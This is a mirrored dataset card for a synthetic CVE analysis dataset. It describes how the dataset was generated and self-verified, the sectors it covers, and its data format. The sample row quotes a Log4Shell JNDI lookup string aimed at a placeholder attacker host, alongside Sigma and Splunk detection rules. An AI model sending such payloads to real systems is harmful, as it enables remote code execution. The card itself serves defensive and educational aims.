five

sh111111111111111/cve-analysis

收藏
Hugging Face2026-03-18 更新2026-03-29 收录
下载链接:
https://hf-mirror.com/datasets/sh111111111111111/cve-analysis
下载链接
链接失效反馈
官方服务:
资源简介:
--- language: - en license: apache-2.0 tags: - cybersecurity - vulnerability-analysis - cve - security - detection-engineering - threat-intelligence - cvss - sigma-rules - splunk - mitre-attack - distillation size_categories: - 1K<n<10K task_categories: - text-generation - question-answering pretty_name: CVE & Vulnerability Analysis Dataset --- # CVE & Vulnerability Analysis Dataset [![Rows](https://img.shields.io/badge/rows-9,999-green.svg)](https://img.shields.io/badge/rows-9,999-green.svg) [![Sectors](https://img.shields.io/badge/sectors-20-blue.svg)](https://img.shields.io/badge/sectors-20-blue.svg) [![Verified](https://img.shields.io/badge/verified-100%25-brightgreen.svg)](https://img.shields.io/badge/verified-100%25-brightgreen.svg) [![CVEs Referenced](https://img.shields.io/badge/CVEs_referenced-60+-blue.svg)](https://img.shields.io/badge/CVEs_referenced-60+-blue.svg) A comprehensive vulnerability analysis and CVE research dataset. Each row is a detailed security analysis covering root cause, exploitation methodology, detection rules (Sigma/Splunk/Suricata), CVSS v3.1 scoring, MITRE ATT&CK mapping, and remediation guidance — verified by the same model in an independent review pass. --- ## Overview This dataset contains **9,999 structured vulnerability analyses** across 20 security domains. Unlike simple CVE descriptions, each entry is a full-depth analysis that a vulnerability researcher or security engineer would produce — including proof-of-concept walkthroughs, language-specific code examples, production detection rules, and prioritized remediation plans. Every prompt references real CVEs, real technologies, and real-world incidents. Responses include detection rules in valid Sigma YAML and Splunk SPL syntax, CVSS v3.1 vector strings with metric-by-metric justification, and MITRE ATT&CK technique mappings. ## Dataset Statistics | Metric | Value | |--------|-------| | **Total rows** | 9,999 | | **Sectors** | 20 vulnerability categories | | **Verification pass rate** | 100% of output rows (9,999/9,999) | | **Unique verified prompts** | 8,150 | | **Verification rounds** | 20 | | **Real CVEs referenced** | 60+ unique CVEs across all prompts | ## What's in Each Row Every analysis covers seven dimensions: 1. **Root Cause Analysis** — Code-level explanation of the vulnerability mechanism, with vulnerable code examples 2. **Affected Versions** — Version matrix, configurations, and environmental factors 3. **Exploitation Methodology** — Step-by-step exploitation with prerequisites, tooling, and PoC walkthrough 4. **Detection Engineering** — Sigma rules, Splunk SPL queries, Suricata/Snort signatures, YARA rules, and host-based indicators 5. **CVSS v3.1 Scoring** — Complete vector string (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) with per-metric justification 6. **MITRE ATT&CK Mapping** — Technique IDs and tactic placement 7. **Remediation** — Patches, workarounds, compensating controls, and verification steps ## Sector Coverage | Sector | Rows | Focus | |--------|------|-------| | web_application_cves | ~615 | SQLi, XSS, SSRF, SSTI, XXE, HTTP smuggling in web frameworks | | remote_code_execution_cves | ~615 | RCE via deserialization, injection, file upload, JNDI across all stacks | | operating_system_cves | ~615 | Linux kernel, Windows kernel, macOS, privilege escalation primitives | | authentication_bypass_cves | ~515 | JWT, OAuth, SAML, session management, MFA bypass techniques | | memory_corruption_cves | ~515 | Buffer overflow, use-after-free, heap corruption, type confusion | | privilege_escalation_cves | ~515 | Kernel exploits, SUID/sudo abuse, container escape, IAM escalation | | injection_cves | ~515 | Command, LDAP, NoSQL, SpEL, OGNL, expression language injection | | cloud_service_cves | ~515 | AWS/Azure/GCP misconfig, SSRF to metadata, IAM abuse, S3 exposure | | network_protocol_cves | ~515 | TLS, DNS, BGP, Kerberos, SMB, SNMP protocol implementation flaws | | supply_chain_cves | ~515 | Dependency confusion, typosquatting, CI/CD pipeline attacks, registry poisoning | | access_control_cves | ~515 | IDOR, broken access control, RBAC bypass, forced browsing | | api_cves | ~515 | BOLA, BFLA, GraphQL abuse, gRPC reflection, mass assignment, rate limiting | | cryptographic_cves | ~515 | Padding oracle, weak TLS, hardcoded keys, broken RNG, cipher downgrade | | information_disclosure_cves | ~515 | Stack traces, debug endpoints, .env exposure, error-based data leaks | | container_k8s_cves | ~415 | Container escape, K8s RBAC bypass, pod security, etcd/kubelet access | | database_cves | ~415 | SQL injection chains, stored procedure abuse, DB privilege escalation | | deserialization_cves | ~415 | Java, .NET, Python pickle, PHP, Ruby deserialization to RCE | | iot_firmware_cves | ~415 | Hardcoded credentials, UART/JTAG, firmware extraction, protocol abuse | | denial_of_service_cves | ~415 | ReDoS, HTTP/2 rapid reset, XML bomb, amplification, algorithmic complexity | | zero_day_analysis | ~415 | Variant analysis, patch diffing, fuzzing triage, exploit primitive identification | ## Real CVEs Referenced Prompts are grounded in real-world vulnerabilities including: | CVE | Name | Year | Severity | |-----|------|------|----------| | CVE-2021-44228 | Log4Shell | 2021 | CRITICAL | | CVE-2017-5638 | Apache Struts RCE | 2017 | CRITICAL | | CVE-2023-34362 | MOVEit Transfer SQLi | 2023 | CRITICAL | | CVE-2020-1472 | Zerologon | 2020 | CRITICAL | | CVE-2021-34527 | PrintNightmare | 2021 | CRITICAL | | CVE-2022-22965 | Spring4Shell | 2022 | CRITICAL | | CVE-2024-3400 | PAN-OS Command Injection | 2024 | CRITICAL | | CVE-2021-26855 | ProxyLogon | 2021 | CRITICAL | | CVE-2014-0160 | Heartbleed | 2014 | HIGH | | CVE-2021-4034 | PwnKit | 2021 | HIGH | | CVE-2024-1086 | nf_tables UAF | 2024 | HIGH | | CVE-2023-4911 | Looney Tunables | 2023 | HIGH | | CVE-2024-21626 | Leaky Vessels (runc) | 2024 | HIGH | | CVE-2023-44487 | HTTP/2 Rapid Reset | 2023 | HIGH | | ... | *60+ total unique CVEs* | | | ## How It Was Made ### Prompt Generation 10,000 prompts were generated across 20 sectors using a template × variation engine with 8 analysis template types: 1. **CVE Deep Dive** — Full analysis of a specific real CVE 2. **Vulnerability Class Analysis** — Analysis of a vulnerability type in a specific technology 3. **Comparative Analysis** — Cross-technology comparison of vulnerability manifestation 4. **Incident-Driven Analysis** — Industry-specific vulnerability assessment report 5. **Exploit Development Analysis** — Exploit primitive and weaponization assessment 6. **Patch Analysis** — Patch completeness, regression risk, and variant analysis 7. **Vulnerability Chaining** — Compound exploitation and chain-breaking defense 8. **Triage & Prioritization** — Scanner validation, environmental CVSS, and SLA recommendation Variables include 12 programming languages, 14 industries, 10 deployment environments, and 60+ real CVE references to ensure diversity. ### Generation Pipeline Prompts were processed through [TeichAI/datagen](https://github.com/TeichAI/datagen) using `openrouter/hunter-alpha` (1T parameter model) via OpenRouter API. The custom system prompt enforces: - Syntactically correct detection rules (Sigma YAML, Splunk SPL, Snort/Suricata) - Valid CVSS v3.1 vector strings - Real MITRE ATT&CK technique IDs - Minimum 1,000 words per analysis - Accurate CVE IDs and version information **Generation challenges:** The initial 10,000-prompt batch hit OpenRouter's 400 req/min rate limit at 40 concurrent, resulting in 6,539 failures on the first pass. The resume system regenerated all missing prompts across subsequent attempts. ### Self-Verification Every generated analysis was verified by sending it back to the same model in a **fresh, independent chat** with a strict verification rubric checking for: | Check | Description | |-------|-------------| | **WRONG_SYNTAX** | Incorrect command flags, invalid detection rule syntax | | **HALLUCINATED_DATA** | Fabricated CVE IDs, impossible version numbers, fake tool names | | **SECURITY_ERROR** | Fundamentally wrong methodology or misattributed vulnerability type | | **SHALLOW** | Insufficient depth, missing required analysis sections | | **MALFORMED_OUTPUT** | Structural issues in the response | | **IMPOSSIBLE_CHAIN** | Logically impossible exploitation sequences | The verification loop: 1. Verify all unverified rows (40 concurrent) 2. PASS → locked in persistent set (never re-checked) 3. FAIL → answer deleted, prompt re-queued for regeneration 4. ERROR (API timeout) → retry verification only (answer kept) 5. Repeat until all pass or max retries exhausted **Results after 20 rounds:** | Round | Verified | Regenerated | To Re-verify | |-------|----------|-------------|--------------| | 1 | +1,906 | 879 | 676 | | 2 | +4,417 | 2,055 | 37 | | 3 | +1,450 | 722 | 22 | | 4 | +428 | 300 | 5 | | 5 | +185 | 128 | 3 | | 6 | +88 | 45 | 1 | | 7-14 | +76 | diminishing | 0-1 | | 15-20 | +2 | 1 stubborn prompt | 0 | | **Total** | **8,150 unique** | | | One prompt never passed verification across 20 regeneration attempts and was removed. Final dataset: **9,999 rows, 100% verified**. ### Cumulative Verification Issues Found (Across All 20 Rounds) These counts are cumulative — most issues were corrected on subsequent regeneration attempts: | Issue Type | Count | Description | |-----------|-------|-------------| | HALLUCINATED_DATA | 2,210 | Fabricated versions, fake CVEs, impossible configurations | | MALFORMED_OUTPUT | 1,313 | Structural issues in response format | | SECURITY_ERROR | 983 | Wrong methodology, misattributed vulnerability type | | SHALLOW | 884 | Insufficient depth, missing analysis sections | | WRONG_SYNTAX | 432 | Invalid command flags, broken detection rule syntax | | CODE | 158 | Code example issues (wrong language, syntax errors) | | IMPOSSIBLE_CHAIN | 109 | Logically impossible exploitation sequences | ## Data Format Each row is a JSONL object with system/user/assistant messages plus metadata: ```json { "messages": [ { "role": "system", "content": "You are a senior vulnerability researcher and security analyst..." }, { "role": "user", "content": "Provide a comprehensive vulnerability analysis of CVE-2021-44228 (Log4Shell) affecting Apache Log4j 2. Include: 1. ROOT CAUSE... 2. AFFECTED VERSIONS... 3. EXPLOITATION... 4. DETECTION: SIEM detection rules (Splunk SPL + Sigma)... 5. CVSS SCORING..." }, { "role": "assistant", "content": "## Root Cause Analysis\n\nCVE-2021-44228 exploits the JNDI lookup feature in Apache Log4j 2.0-beta9 through 2.14.1. When a log message contains a string like `${jndi:ldap://attacker.com/payload}`, the Log4j library performs a JNDI lookup...\n\n## Detection Rules\n\n### Sigma Rule\n```yaml\ntitle: Log4Shell JNDI Exploitation Attempt\nstatus: production\nlogsource:\n category: webserver\n product: apache\ndetection:\n selection:\n cs-uri|contains:\n - '${jndi:'\n - '${${lower:j}ndi:'\n condition: selection\nlevel: critical\n```\n\n### Splunk SPL\n```spl\nindex=web sourcetype=access_combined\n| regex _raw=\"\\$\\{(j|\\$\\{lower:j\\})ndi:\"\n| stats count by src_ip, uri_path, status\n| where count > 3\n```\n\n## CVSS v3.1\nVector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0\n- Attack Vector (AV:N): Network-accessible, no physical access required\n- Attack Complexity (AC:L): No special conditions needed...\n..." } ], "sector": "remote_code_execution_cves", "verified": true } ``` ## Usage ```python from datasets import load_dataset dataset = load_dataset("your-user/cve-analysis") # All rows are verified train = dataset["train"] print(f"Total: {len(train)} rows") # Filter by sector web_cves = train.filter(lambda x: x.get("sector") == "web_application_cves") cloud_cves = train.filter(lambda x: x.get("sector") == "cloud_service_cves") # Extract analysis content for row in train: user_prompt = row["messages"][1]["content"] analysis = row["messages"][2]["content"] ``` ### Use Cases - **Fine-tuning vulnerability analysis models** — Train AI to produce structured CVE analyses - **Detection engineering training** — Generate Sigma/Splunk/Suricata rules for vulnerability classes - **Security analyst copilots** — Train models that help SOC teams triage and respond to vulnerabilities - **CVSS scoring automation** — Train models to produce justified CVSS vector strings - **Threat intelligence enrichment** — Auto-generate vulnerability context for threat feeds - **Security education** — Teach vulnerability analysis methodology with real-world grounding ## Technical Details | Component | Detail | |-----------|--------| | Teacher model | openrouter/hunter-alpha (1T parameters) | | API | OpenRouter (https://openrouter.ai/api/v1) | | Concurrency | 40 simultaneous API calls | | Reasoning effort | High | | Rate limit encountered | 400 req/min | | Generation time | ~13 hours (initial pass + regeneration across 20 attempts) | | Verification rounds | 20 | | Total API cost | $0 (free-tier model) | ## Limitations - **Self-verification bias**: The same model generated and verified analyses. While verification uses a fresh chat context with a strict rubric, inherent model biases persist. - **No human expert review**: All 9,999 analyses were verified automatically. Detection rules and CVSS scores have not been validated by human security engineers. - **CVE accuracy**: While prompts reference real CVEs, some generated analyses may contain subtle inaccuracies in version numbers, dates, or technical details that passed automated verification. ## Citation ```bibtex @dataset{cve_analysis_2026, title={CVE & Vulnerability Analysis Dataset}, year={2026}, url={https://huggingface.co/datasets/sh111111111111111/cve-analysis}, note={9,999 verified vulnerability analyses across 20 sectors with detection rules and CVSS scoring} } ``` ## License Apache 2.0
提供机构:
sh111111111111111
5,000+
优质数据集
54 个
任务类型
进入经典数据集
二维码
社区交流群

面向社区/商业的数据集话题

二维码
科研交流群

面向高校/科研机构的开源数据集话题

数据驱动未来

携手共赢发展

商业合作